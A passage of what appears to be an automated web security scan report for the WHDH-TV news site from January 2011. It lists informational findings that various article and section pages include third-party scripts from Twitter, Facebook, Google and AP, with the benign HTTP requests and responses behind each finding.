<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Packers beat Bears 21-14 to win NFC title</title>
<meta name="publisher" c
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1553. http://www1.whdh.com/news/articles/sports/12003353363032/steelers-beat-jets-24-19-for-afc-title/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/sports/12003353363032/steelers-beat-jets-24-19-for-afc-title/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/sports/12003353363032/steelers-beat-jets-24-19-for-afc-title/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:10 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=18113
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:57:13 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18686
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Steelers beat Jets 24-19 for AFC title</title>
<meta name="publisher" cont
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1554. http://www1.whdh.com/news/articles/sports/12003353873253/steelers-vs-pack-a-hair-raisin-game-in-big-d/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/sports/12003353873253/steelers-vs-pack-a-hair-raisin-game-in-big-d/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/sports/12003353873253/steelers-vs-pack-a-hair-raisin-game-in-big-d/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:14 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=26529
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 05:17:34 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20875
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Steelers vs. Pack: A hair-raisin' game in Big D</title>
<meta name="publis
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1555. http://www1.whdh.com/news/articles/viewervoices/12003189166055/what-do-you-think-about-the-governor-s-agenda-for-his-second-term/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/viewervoices/12003189166055/what-do-you-think-about-the-governor-s-agenda-for-his-second-term/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi
  • https://7newswhdh.appspot.com/js/ytd-embed.js

Request

GET /news/articles/viewervoices/12003189166055/what-do-you-think-about-the-governor-s-agenda-for-his-second-term/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=25438
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 04:59:57 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21786
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - What do you think about the governor's agenda for his second term?</title>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<!-- end: aa -->

<script type="text/javascript" src="https://7newswhdh.appspot.com/js/ytd-embed.js"></script>
...[SNIP]...

21.1556. http://www1.whdh.com/news/articles/viewervoices/12003343955230/how-are-you-dealing-with-all-the-snow/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/viewervoices/12003343955230/how-are-you-dealing-with-all-the-snow/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi
  • https://7newswhdh.appspot.com/js/ytd-embed.js

Request

GET /news/articles/viewervoices/12003343955230/how-are-you-dealing-with-all-the-snow/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:42 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=26899
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 05:24:11 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21658
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - How are you dealing with all the snow?</title>
<meta name="publisher" cont
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<!-- end: aa -->

<script type="text/javascript" src="https://7newswhdh.appspot.com/js/ytd-embed.js"></script>
...[SNIP]...

21.1557. http://www1.whdh.com/news/articles/world/12003356844567/official-pirates-may-try-to-avenge-skorean-rescue/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/world/12003356844567/official-pirates-may-try-to-avenge-skorean-rescue/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://img.video.ap.org/p/j/apovn.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/world/12003356844567/official-pirates-may-try-to-avenge-skorean-rescue/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:06 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=18422
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 03:02:19 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19725
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Official: Pirates may try to avenge SKorean rescue</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1558. http://www1.whdh.com/news/articles/world/12003357704219/moscow-airport-terror-attack-kills-31-wounds-168/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/world/12003357704219/moscow-airport-terror-attack-kills-31-wounds-168/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://img.video.ap.org/p/j/apovn.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/world/12003357704219/moscow-airport-terror-attack-kills-31-wounds-168/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:09 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=39035
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:45:54 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28057
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Moscow airport terror attack kills 31, wounds 168</title>
<meta name="publ
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1559. http://www1.whdh.com/news/articles/world/12003359648674/london-bound-flight-diverted-after-threat/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/world/12003359648674/london-bound-flight-diverted-after-threat/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://img.video.ap.org/p/j/apovn.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/world/12003359648674/london-bound-flight-diverted-after-threat/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:10 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=38970
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:44:49 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19062
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - London-bound flight diverted after threat</title>
<meta name="publisher" c
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1560. http://www1.whdh.com/news/articles/world/21003357763036/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/world/21003357763036/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://img.video.ap.org/p/j/apovn.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/world/21003357763036/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:06 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=32952
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 07:04:28 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 24623
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Moscow airport terror attack kills 31, wounds 168</title>
<meta name="publ
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1561. http://www1.whdh.com/news/main/bizarre/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/bizarre/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/bizarre/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:49:28 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 351
Cache-Control: max-age=1668
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:16:26 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107017 (MII-APC/1.6)
Content-Length: 32352
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title></title>
<meta name="publisher" content="New England News Station Boston Channel 7 W
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1562. http://www1.whdh.com/news/main/entertainment/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/entertainment/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/entertainment/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:17 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1749
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:23:36 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 32646
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Entertainment News, Celebrity Gossip, Movie Trailers, TV and Mu
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1563. http://www1.whdh.com/news/main/local/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/local/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/local/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:11 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1311
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:16:12 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107006 (MII-APC/1.6)
Content-Length: 33479
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Local / Regional Massachusetts and New England News</title>
<m
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1564. http://www1.whdh.com/news/main/local/boston/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/local/boston/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/local/boston/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:09 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=1748
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:39:26 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107113 (MII-APC/1.6)
Connection: close
Content-Length: 33406

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Metro Boston News</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1565. http://www1.whdh.com/news/main/local/capeandislands/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/local/capeandislands/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/local/capeandislands/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:13 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 2
Cache-Control: max-age=1747
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:39:28 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 16943

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Cape Cod and Islands News</title>
<meta name="publisher" conte
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1566. http://www1.whdh.com/news/main/local/metro-west/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/local/metro-west/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/local/metro-west/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:08 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=727
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:22:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34574
Via: 1.1 mdw107114 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Boston Metro West News</title>
<meta name="publisher" content=
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1567. http://www1.whdh.com/news/main/local/north/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/local/north/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/local/north/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
